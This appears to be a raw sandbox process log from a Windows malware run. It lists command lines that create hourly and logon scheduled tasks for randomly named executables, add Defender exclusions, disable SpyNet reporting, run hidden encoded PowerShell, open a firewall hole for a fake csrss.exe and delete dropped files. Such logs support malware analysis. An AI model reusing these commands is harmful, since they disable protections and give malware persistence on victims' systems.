"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5696 -ip 5696
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5760 -ip 5760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4356 -ip 4356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 500
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5612 -ip 5612
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 784
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1040
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1084
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1168
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1436
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe" & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5612 -ip 5612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1176
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gmMtRmbFQ" /SC once /ST 02:20:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4456 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gmMtRmbFQ"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2392 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,16278317835196621194,14093405363716227959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,12680326858247453380,12073360191697778118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
"C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 HR" /sc HOURLY /rl HIGHEST
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe
"C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6176 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6260 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gmMtRmbFQ"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bNEqRyuTSpchqwHoUe" /SC once /ST 11:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe\" Lw /yBsite_idjQg 525403 /S" /V1 /F
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe"
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2169.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\2169.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
